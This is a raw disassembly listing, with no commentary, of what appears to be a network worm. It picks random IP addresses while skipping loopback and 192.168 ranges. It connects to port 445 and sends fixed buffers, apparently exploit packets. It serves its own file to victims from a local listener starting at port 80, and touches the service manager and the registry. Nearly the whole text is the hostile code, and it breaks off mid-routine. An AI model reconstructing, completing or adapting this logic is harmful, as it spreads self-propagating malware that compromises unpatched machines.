mov dword ptr ds:loc_40408F+1, eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43F0A2: ; CODE XREF: .data:0043F13B�j
cmp esi, 0FFFFFFFFh
jz loc_43F153
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43F132
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword ptr ds:loc_404030, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword ptr ds:loc_404030+4, eax
mov eax, [edx+4]
mov dword ptr ds:loc_404035+3, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, loc_40403A+2
mov esi, dword ptr ds:loc_404030+4
rep movsd
lea edi, loc_40403A+2
mov dword ptr ds:loc_404030+4, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43F132
js short loc_43F140
mov edi, [ebx+8]
push ebx
call sub_43F03F
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43EFE5
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43F132: ; CODE XREF: .data:0043F0B3�j
; .data:0043F108�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43F0A2
; ---------------------------------------------------------------------------
loc_43F140: ; CODE XREF: .data:0043F10A�j
xor eax, eax
jmp short loc_43F1B5
; ---------------------------------------------------------------------------
loc_43F144: ; CODE XREF: .data:0043F082�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43EFE5
add esp, 0Ch
loc_43F153: ; CODE XREF: .data:0043F0A5�j
push 0
mov dword ptr ds:loc_404010, 0Bh
push 0Bh
call sub_440921
add esp, 8
or eax, eax
jnz short loc_43F18E
push 0
mov dword ptr ds:loc_404010, 8
push 8
call sub_440921
add esp, 8
or eax, eax
jnz short loc_43F18E
mov eax, 1
jmp short loc_43F1B5
; ---------------------------------------------------------------------------
loc_43F18E: ; CODE XREF: .data:0043F16B�j
; .data:0043F185�j
cmp eax, 0FFFFFFFFh
jz short loc_43F1BD
push eax
push dword ptr ds:loc_404010
call sub_440921
add esp, 8
push dword ptr ds:loc_404010
call sub_440909
add esp, 4
mov eax, 1
loc_43F1B5: ; CODE XREF: .data:0043F142�j
; .data:0043F18C�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_43F1BD: ; CODE XREF: .data:0043F191�j
cmp dword ptr ds:loc_40402C, 0
jnz short loc_43F1CD
mov eax, 1
jmp short loc_43F1B5
; ---------------------------------------------------------------------------
loc_43F1CD: ; CODE XREF: .data:0043F1C4�j
mov eax, dword ptr ds:loc_40402C
push 0Bh
jmp eax
; ---------------------------------------------------------------------------
dw 0B858h
dd 1, 0A164D7EBh, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 40401Ch
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp-18h], esp
push eax
fnstcw word ptr [esp]
or word ptr [esp], 300h
fldcw word ptr [esp]
add esp, 4
push 0
push 0
push 404028h
push 404024h
push 404020h
call sub_4408CD
push dword ptr ds:loc_404027+1
push dword ptr ds:loc_404021+3
push dword ptr ds:loc_40401B+5
mov dword ptr ds:loc_404011+3, esp
call sub_440625
add esp, 18h
xor ecx, ecx
mov [ebp-4], ecx
push eax
call sub_4408E5
leave
retn
; ---------------------------------------------------------------------------
db 64h, 0A3h, 0
dd 0C3000000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F261 proc near ; CODE XREF: sub_43F2FC+12�p
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 2
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_4408C1
add esp, 0Ch
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_43F284: ; CODE XREF: sub_43F261+28�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F284
mov ebx, eax
mov [ebp+var_2], bl
mov [ebp+var_1], 0
jmp short loc_43F2AC
; ---------------------------------------------------------------------------
loc_43F296: ; CODE XREF: sub_43F261+55�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_43F2AC: ; CODE XREF: sub_43F261+33�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_43F296
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_43F2D8
; ---------------------------------------------------------------------------
loc_43F2C6: ; CODE XREF: sub_43F261+88�j
push 404DE5h
push edi
call sub_440945
add esp, 8
add [ebp+var_3], 1
loc_43F2D8: ; CODE XREF: sub_43F261+63�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_43F2C6
push [ebp+arg_8]
push edi
call sub_440945
add esp, 8
pop edi
pop esi
pop ebx
leave
retn
sub_43F261 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F2FC proc near ; CODE XREF: sub_44041D+97�p
var_32 = byte ptr -32h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push offset sub_404DE3
lea eax, [ebp+var_32]
push eax
push [ebp+arg_0]
call sub_43F261
add esp, 0Ch
lea eax, [ebp+var_32]
push eax
call sub_440735
leave
retn
sub_43F2FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F321 proc near ; CODE XREF: .data:004403DB�p
; sub_44041D+F1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push eax
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_440885
mov edi, eax
or edi, edi
jz short loc_43F351
xor eax, eax
jmp short loc_43F389
; ---------------------------------------------------------------------------
loc_43F351: ; CODE XREF: sub_43F321+2A�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_4408B5
mov edi, eax
push [ebp+var_4]
call sub_440891
or edi, edi
jz short loc_43F379
xor eax, eax
jmp short loc_43F389
; ---------------------------------------------------------------------------
loc_43F379: ; CODE XREF: sub_43F321+52�j
cmp [ebp+var_8], 1
jnz short loc_43F386
mov eax, 2
jmp short loc_43F389
; ---------------------------------------------------------------------------
loc_43F386: ; CODE XREF: sub_43F321+5C�j
xor eax, eax
inc eax
loc_43F389: ; CODE XREF: sub_43F321+2E�j
; sub_43F321+56�j ...
pop edi
leave
retn
sub_43F321 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F38C proc near ; CODE XREF: .data:004403B4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_44089D
mov edi, eax
or edi, edi
jz short loc_43F3B1
xor eax, eax
jmp short loc_43F3DC
; ---------------------------------------------------------------------------
loc_43F3B1: ; CODE XREF: sub_43F38C+1F�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_4408A9
mov edi, eax
push [ebp+var_4]
call sub_440891
or edi, edi
jz short loc_43F3D9
xor eax, eax
jmp short loc_43F3DC
; ---------------------------------------------------------------------------
loc_43F3D9: ; CODE XREF: sub_43F38C+47�j
xor eax, eax
inc eax
loc_43F3DC: ; CODE XREF: sub_43F38C+23�j
; sub_43F38C+4B�j
pop edi
leave
retn
sub_43F38C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 200h
push ebx
push esi
push edi
xor ebx, ebx
push 0
push 100h
lea eax, [ebp-100h]
push eax
push dword ptr [ebp+8]
call sub_4405DD
cmp eax, 0FFFFFFFFh
jz loc_43F523
push 404DDFh
lea eax, [ebp-100h]
push eax
call sub_44095D
add esp, 8
or eax, eax
jz loc_43F4E5
push 404DDBh
lea edx, [ebp-100h]
push edx
call sub_44095D
add esp, 8
or eax, eax
jz loc_43F4E5
push 0
push 3Dh
push 404D9Dh
push dword ptr [ebp+8]
call sub_4405E9
push dword ptr ds:loc_403003+1
push offset sub_404D86
lea eax, [ebp-200h]
push eax
call sub_44092D
add esp, 0Ch
lea ecx, [ebp-200h]
or eax, 0FFFFFFFFh
loc_43F478: ; CODE XREF: .data:0043F47D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F478
push 0
push eax
lea edx, [ebp-200h]
push edx
push dword ptr [ebp+8]
call sub_4405E9
loc_43F491: ; CODE XREF: .data:0043F4D7�j
mov eax, dword ptr ds:loc_403003+1
mov edi, eax
sub edi, ebx
cmp edi, 1000h
jb short loc_43F4A7
mov edi, 1000h
loc_43F4A7: ; CODE XREF: .data:0043F4A0�j
or edi, edi
jz short loc_43F4D9
push 0
push edi
mov eax, ebx
add eax, dword ptr ds:loc_403003+5
push eax
push dword ptr [ebp+8]
call sub_4405E9
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_43F523
cmp esi, 1000h
jb short loc_43F4D9
add ebx, esi
push 64h
call sub_440795
jmp short loc_43F491
; ---------------------------------------------------------------------------
loc_43F4D9: ; CODE XREF: .data:0043F4A9�j
; .data:0043F4CC�j
push offset sub_404098
call sub_44074D
jmp short loc_43F507
; ---------------------------------------------------------------------------
loc_43F4E5: ; CODE XREF: .data:0043F422�j
; .data:0043F43E�j
push 0
push 15h
push offset sub_404D70
push dword ptr [ebp+8]
call sub_4405E9
push 0
push 0Dh
push 40409Ch
push dword ptr [ebp+8]
call sub_4405E9
loc_43F507: ; CODE XREF: .data:0043F4E3�j
push 7D0h
call sub_440795
push 2
push dword ptr [ebp+8]
call sub_4405F5
push dword ptr [ebp+8]
call sub_44057D
loc_43F523: ; CODE XREF: .data:0043F406�j
; .data:0043F4C4�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 0
push offset sub_404098
call sub_440741
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset sub_403010
call sub_440765
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_43F569
push 1
call sub_4406D5
loc_43F569: ; CODE XREF: .data:0043F560�j
push 0
push ebx
call sub_4406F9
mov dword ptr ds:loc_403003+1, eax
push eax
push 0
call sub_440759
mov dword ptr ds:loc_403003+5, eax
push 0
lea eax, [ebp-30h]
push eax
push dword ptr ds:loc_403003+1
push dword ptr ds:loc_403003+5
push ebx
call sub_440771
push ebx
call sub_440711
push 0
push 1
push 2
call sub_440601
mov esi, eax
push 10h
lea eax, [ebp-24h]
push eax
call sub_440789
mov word ptr [ebp-24h], 2
and dword ptr [ebp-20h], 0
mov word ptr [ebp-26h], 0
loc_43F5C9: ; CODE XREF: .data:0043F609�j
movzx eax, word ptr [ebp-26h]
add eax, 50h
mov word ptr ds:loc_40408F+5, ax
movzx eax, word ptr ds:loc_40408F+5
push eax
call sub_4405AD
mov edx, eax
mov [ebp-22h], dx
push 10h
lea eax, [ebp-24h]
push eax
push esi
call sub_440571
mov [ebp-2Ch], eax
inc word ptr [ebp-26h]
or eax, eax
jz short loc_43F60B
movzx eax, word ptr [ebp-26h]
cmp eax, 0FDE8h
jl short loc_43F5C9
loc_43F60B: ; CODE XREF: .data:0043F5FE�j
push 64h
push esi
call sub_4405D1
mov dword ptr [ebp-4], 10h
loc_43F61A: ; CODE XREF: .data:0043F645�j
lea eax, [ebp-4]
push eax
lea eax, [ebp-14h]
push eax
push esi
call sub_440565
mov edi, eax
lea eax, [ebp-34h]
push eax
push 0
push edi
push 40141Ah
push 0
push 0
call sub_4407B9
push eax
call sub_440711
jmp short loc_43F61A
; ---------------------------------------------------------------------------
db 5Fh
dd 0C3C95B5Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F64C proc near ; CODE XREF: .data:0043FE7F�p
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_13]
lea esi, loc_4040A6+4
mov ecx, 4
rep movsd
lea edi, [ebp+var_18]
lea esi, sub_4040BA
mov ecx, 5
rep movsb
loc_43F675: ; CODE XREF: sub_43F64C+51�j
; sub_43F64C+74�j
call sub_440915
mov ecx, 0DDh
cdq
idiv ecx
lea edi, [edx+3]
mov ebx, edi
mov [ebp+var_3], bl
mov [ebp+var_2], 0
jmp short loc_43F6C6
; ---------------------------------------------------------------------------
loc_43F692: ; CODE XREF: sub_43F64C+81�j
mov al, [ebp+var_3]
movzx edx, [ebp+var_2]
cmp al, [ebp+edx+var_13]
jz short loc_43F675
movzx eax, [ebp+var_2]
cmp eax, 5
jnb short loc_43F6C2
movzx eax, [ebp+var_3]
movzx edx, [ebp+var_2]
movzx ecx, [ebp+edx+var_13]
cmp eax, ecx
jb short loc_43F6C2
movzx edx, [ebp+edx+var_18]
cmp eax, edx
jbe short loc_43F675
loc_43F6C2: ; CODE XREF: sub_43F64C+5A�j
; sub_43F64C+6B�j
inc [ebp+var_2]
loc_43F6C6: ; CODE XREF: sub_43F64C+44�j
movzx eax, [ebp+var_2]
cmp eax, 10h
jb short loc_43F692
loc_43F6CF: ; CODE XREF: sub_43F64C+AC�j
call sub_440915
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_19], bl
movzx eax, [ebp+var_3]
cmp eax, 0C0h
jnz short loc_43F6FA
movzx eax, [ebp+var_19]
cmp eax, 0A8h
jz short loc_43F6CF
loc_43F6FA: ; CODE XREF: sub_43F64C+A1�j
call sub_440915
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1A], bl
call sub_440915
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1B], bl
movzx eax, [ebp+var_1B]
push eax
movzx eax, [ebp+var_1A]
push eax
movzx eax, [ebp+var_19]
push eax
movzx eax, [ebp+var_3]
push eax
push 404D64h
push [ebp+arg_0]
call sub_44092D
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_43F64C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F74D proc near ; CODE XREF: .data:00440084�p
var_89F4 = dword ptr -89F4h
var_89F0 = dword ptr -89F0h
var_89EC = dword ptr -89ECh
var_89E8 = dword ptr -89E8h
var_89E3 = byte ptr -89E3h
var_89E2 = word ptr -89E2h
var_89E0 = byte ptr -89E0h
var_89D8 = byte ptr -89D8h
var_8970 = byte ptr -8970h
var_6900 = byte ptr -6900h
var_68E2 = byte ptr -68E2h
var_6842 = byte ptr -6842h
var_6136 = dword ptr -6136h
var_6126 = byte ptr -6126h
var_6112 = byte ptr -6112h
var_60A2 = byte ptr -60A2h
var_55DE = byte ptr -55DEh
var_403A = byte ptr -403Ah
var_4039 = byte ptr -4039h
var_3FBD = byte ptr -3FBDh
var_37ED = byte ptr -37EDh
var_3342 = byte ptr -3342h
var_3058 = dword ptr -3058h
var_3054 = dword ptr -3054h
var_3050 = dword ptr -3050h
var_304C = word ptr -304Ch
var_304A = word ptr -304Ah
var_3048 = dword ptr -3048h
var_303C = byte ptr -303Ch
var_3039 = byte ptr -3039h
var_300F = byte ptr -300Fh
var_300D = byte ptr -300Dh
var_300C = byte ptr -300Ch
var_2FC7 = byte ptr -2FC7h
var_2F83 = byte ptr -2F83h
var_2987 = byte ptr -2987h
var_21A3 = byte ptr -21A3h
var_2193 = byte ptr -2193h
var_1E6F = byte ptr -1E6Fh
var_1E6B = byte ptr -1E6Bh
var_1E5F = byte ptr -1E5Fh
var_1BDA = byte ptr -1BDAh
var_1BD9 = byte ptr -1BD9h
var_B46 = byte ptr -0B46h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 89F4h
call sub_440689
push ebx
push esi
push edi
mov [ebp+var_3054], 1
mov [ebp+var_89F0], 1
lea edi, [ebp+var_89E0]
lea esi, loc_4049EC+4
movsd
movsd
and [ebp+var_89F4], 0
mov [ebp+var_89E2], 1BDh
push 0
push 1
push 2
call sub_440601
mov [ebp+var_54], eax
cmp eax, 0FFFFFFFFh
jz loc_43FDA3
mov eax, [ebp+arg_0]
mov [ebp+var_89EC], eax
push eax
call sub_4405C5
push 1Dh
push eax
lea edi, [ebp+var_6900]
push edi
call sub_4407A1
lea eax, [ebp+var_6900]
push eax
push 404D5Ah
lea eax, [ebp+var_7C]
push eax
call sub_44092D
add esp, 0Ch
xor ebx, ebx
loc_43F7DE: ; CODE XREF: sub_43F74D+A2�j
mov dl, [ebp+ebx+var_7C]
mov [ebp+ebx*2+var_50], dl
mov [ebp+ebx*2+var_4F], 0
inc ebx
cmp ebx, 28h
jl short loc_43F7DE
push 60h
push 404525h
lea eax, [ebp+var_303C]
push eax
call sub_4408F1
lea eax, [ebp+var_7C]
push eax
call sub_4407AD
mov edi, eax
shl edi, 1
push edi
lea edi, [ebp+var_50]
push edi
lea edi, [ebp+var_300C]
push edi
call sub_4408F1
lea eax, [ebp+var_7C]
push eax
call sub_4407AD
push 9
push 40457Ch
mov edi, eax
shl edi, 1
lea edi, [ebp+edi+var_300D]
push edi
call sub_4408F1
lea eax, [ebp+var_7C]
push eax
call sub_4407AD
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 34h
mov edx, edi
mov [ebp+var_403A], dl
push 1
lea eax, [ebp+var_403A]
push eax
lea eax, [ebp+var_3039]
push eax
call sub_4408F1
lea eax, [ebp+var_7C]
push eax
call sub_4407AD
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 9
mov edx, edi
mov [ebp+var_89E3], dl
push 1
lea eax, [ebp+var_89E3]
push eax
lea eax, [ebp+var_300F]
push eax
call sub_4408F1
mov eax, [ebp+arg_4]
mov [ebp+var_3058], eax
push 0E29h
push 31h
lea eax, [ebp+var_4039]
push eax
call sub_4408FD
add esp, 48h
push 10h
lea eax, [ebp+var_304C]
push eax
call sub_440789
mov [ebp+var_304C], 2
movsx eax, [ebp+var_89E2]
movzx eax, ax
push eax
call sub_4405AD
mov edi, eax
mov [ebp+var_304A], di
mov eax, [ebp+arg_0]
mov [ebp+var_3048], eax
push 10h
lea eax, [ebp+var_304C]
push eax
push [ebp+var_54]
call sub_440589
cmp eax, 0FFFFFFFFh
jnz short loc_43F920
mov [ebp+var_3054], 2
jmp loc_43FD9B
; ---------------------------------------------------------------------------
loc_43F920: ; CODE XREF: sub_43F74D+1C2�j
push 64h
call sub_440795
push 0
push 89h
push offset sub_404313
push [ebp+var_54]
call sub_4405E9
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_440795
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405DD
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD91
push 0
push 0A8h
push offset sub_40439D
push [ebp+var_54]
call sub_4405E9
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_440795
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405DD
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD91
push 0
push 0DEh
push 404446h
push [ebp+var_54]
call sub_4405E9
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_440795
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405DD
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD91
mov eax, [ebp+var_80]
cmp eax, 0FFFFFFFFh
jz short loc_43F9FA
cmp eax, 46h
jge short loc_43F9FF
loc_43F9FA: ; CODE XREF: sub_43F74D+2A6�j
jmp loc_43FD91
; ---------------------------------------------------------------------------
loc_43F9FF: ; CODE XREF: sub_43F74D+2AB�j
lea eax, [ebp+var_2F83]
mov [ebp+var_89E8], eax
cmp byte ptr [eax], 31h
setnz al
and eax, 1
mov [ebp+var_3050], eax
jz loc_43FB13
push 0DACh
push 90h
lea eax, [ebp+var_2987]
push eax
call sub_4408FD
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_21A3]
push eax
call sub_4408F1
push [ebp+arg_8]
push [ebp+var_3058]
lea eax, [ebp+var_2193]
push eax
call sub_4408F1
push 4
push 404D55h
lea eax, [ebp+var_1E6F]
push eax
call sub_4408F1
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_1E6B]
push eax
call sub_4408F1
push [ebp+var_3058]
call sub_4407AD
push eax
push [ebp+var_3058]
lea edi, [ebp+var_1E5F]
push edi
call sub_4408F1
add esp, 48h
xor ebx, ebx
loc_43FABB: ; CODE XREF: sub_43F74D+38B�j
mov dl, [ebp+ebx+var_2987]
mov [ebp+ebx*2+var_1BDA], dl
mov [ebp+ebx*2+var_1BD9], 0
inc ebx
cmp ebx, 0DACh
jl short loc_43FABB
mov [ebp+var_82], 0
mov [ebp+var_81], 0
push 1C52h
push 31h
lea eax, [ebp+var_89D8]
push eax
call sub_4408FD
push 1C52h
push 31h
lea eax, [ebp+var_6112]
push eax
call sub_4408FD
add esp, 18h
jmp short loc_43FB75
; ---------------------------------------------------------------------------
loc_43FB13: ; CODE XREF: sub_43F74D+2CD�j
push 7D0h
push 90h
lea eax, [ebp+var_68E2]
push eax
call sub_4408FD
push [ebp+var_3058]
call sub_4407AD
push eax
push [ebp+var_3058]
lea edi, [ebp+var_6842]
push edi
call sub_4408F1
lea eax, [ebp+var_89E0]
push eax
call sub_4407AD
push eax
lea edi, [ebp+var_89E0]
push edi
lea edi, [ebp+var_6126]
push edi
call sub_4408F1
add esp, 24h
mov eax, dword ptr ds:loc_404936+2
mov [ebp+var_6136], eax
loc_43FB75: ; CODE XREF: sub_43F74D+3C4�j
push 0
movsx eax, [ebp+var_403A]
add eax, 4
push eax
lea eax, [ebp+var_303C]
push eax
push [ebp+var_54]
call sub_4405E9
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_440795
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405DD
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD91
push 0
push 68h
push 404586h
push [ebp+var_54]
call sub_4405E9
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_440795
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405DD
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD91
push 0
push 0A0h
push offset sub_4045EF
push [ebp+var_54]
call sub_4405E9
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_440795
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405DD
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD91
cmp [ebp+var_3050], 0
jz loc_43FD1D
push 68h
push 40479Eh
lea eax, [ebp+var_89D8]
push eax
call sub_4408F1
push 1B5Ah
lea eax, [ebp+var_1BDA]
push eax
lea eax, [ebp+var_8970]
push eax
call sub_4408F1
push 70h
push 404807h
lea eax, [ebp+var_6112]
push eax
call sub_4408F1
push 0A5Eh
lea eax, [ebp+var_B46]
push eax
lea eax, [ebp+var_60A2]
push eax
call sub_4408F1
push 84h
push 404878h
lea eax, [ebp+var_55DE]
push eax
call sub_4408F1
add esp, 3Ch
push 0
push 10FCh
lea eax, [ebp+var_89D8]
push eax
push [ebp+var_54]
call sub_4405E9
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_440795
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405DD
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD91
push 0
push 0FDCh
lea eax, [ebp+var_6112]
push eax
push [ebp+var_54]
call sub_4405E9
cmp eax, 0FFFFFFFFh
jnz short loc_43FD83
jmp short loc_43FD83
; ---------------------------------------------------------------------------
loc_43FD1D: ; CODE XREF: sub_43F74D+4FA�j
push 7Ch
push 404690h
lea eax, [ebp+var_4039]
push eax
call sub_4408F1
push 7D0h
lea eax, [ebp+var_68E2]
push eax
lea eax, [ebp+var_3FBD]
push eax
call sub_4408F1
push 90h
push offset sub_40470D
lea eax, [ebp+var_37ED]
push eax
call sub_4408F1
add esp, 24h
mov [ebp+var_3342], 0
push 0
push 0CF8h
lea eax, [ebp+var_4039]
push eax
push [ebp+var_54]
call sub_4405E9
cmp eax, 0FFFFFFFFh
jnz short $+2
loc_43FD83: ; CODE XREF: sub_43F74D+5CC�j
; sub_43F74D+5CE�j
push 64h
call sub_440795
and [ebp+var_3054], 0
loc_43FD91: ; CODE XREF: sub_43F74D+216�j
; sub_43F74D+258�j ...
push 2
push [ebp+var_54]
call sub_4405F5
loc_43FD9B: ; CODE XREF: sub_43F74D+1CE�j
push [ebp+var_54]
call sub_44057D
loc_43FDA3: ; CODE XREF: sub_43F74D+53�j
mov eax, [ebp+var_3054]
pop edi
pop esi
pop ebx
leave
retn
sub_43F74D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FDAE proc near ; CODE XREF: .data:loc_43FE22�p
var_32 = byte ptr -32h
push ebp
mov ebp, esp
sub esp, 34h
push esi
push edi
push 31h
lea eax, [ebp+var_32]
push eax
call sub_4405A1
cmp eax, 0FFFFFFFFh
jnz short loc_43FDCA
xor eax, eax
jmp short loc_43FDE4
; ---------------------------------------------------------------------------
loc_43FDCA: ; CODE XREF: sub_43FDAE+16�j
lea eax, [ebp+var_32]
push eax
call sub_440595
mov edi, eax
or edi, edi
jnz short loc_43FDDD
xor eax, eax
jmp short loc_43FDE4
; ---------------------------------------------------------------------------
loc_43FDDD: ; CODE XREF: sub_43FDAE+29�j
mov eax, [edi+0Ch]
mov esi, [eax]
mov eax, [esi]
loc_43FDE4: ; CODE XREF: sub_43FDAE+1A�j
; sub_43FDAE+2D�j
pop edi
pop esi
leave
retn
sub_43FDAE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
call sub_44071D
push eax
call sub_440939
mov esi, 254h
mov eax, esi
add eax, 0Ah
push eax
push 0
call sub_440759
mov ebx, eax
push esi
push offset sub_4040BF
push ebx
call sub_4408F1
add esp, 10h
loc_43FE22: ; CODE XREF: .data:0043FE3C�j
; .data:0043FE76�j ...
call sub_43FDAE
mov [ebp-10Ch], eax
or eax, eax
jnz short loc_43FE3E
push 384h
call sub_4408D9
pop ecx
jmp short loc_43FE22
; ---------------------------------------------------------------------------
loc_43FE3E: ; CODE XREF: .data:0043FE2F�j
mov al, [ebp-10Ch]
mov [ebp-111h], al
mov al, [ebp-10Bh]
mov [ebp-112h], al
mov al, [ebp-10Ah]
mov [ebp-135h], al
cmp byte ptr [ebp-111h], 7Fh
jnz short loc_43FE78
push 384h
call sub_4408D9
pop ecx
jmp short loc_43FE22
; ---------------------------------------------------------------------------
loc_43FE78: ; CODE XREF: .data:0043FE69�j
lea eax, [ebp-130h]
push eax
call sub_43F64C
push 0
call sub_4408D9
add esp, 8
call sub_440915
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-134h], dl
call sub_440915
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-131h], dl
call sub_440915
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-132h], dl
call sub_440915
mov ecx, 0Ah
cdq
idiv ecx
mov [ebp-133h], dl
mov al, [ebp-133h]
cmp al, 5
jnb short loc_43FF15
mov al, [ebp-112h]
mov [ebp-134h], al
mov al, [ebp-133h]
cmp al, 3
jnb short loc_43FF15
mov al, [ebp-135h]
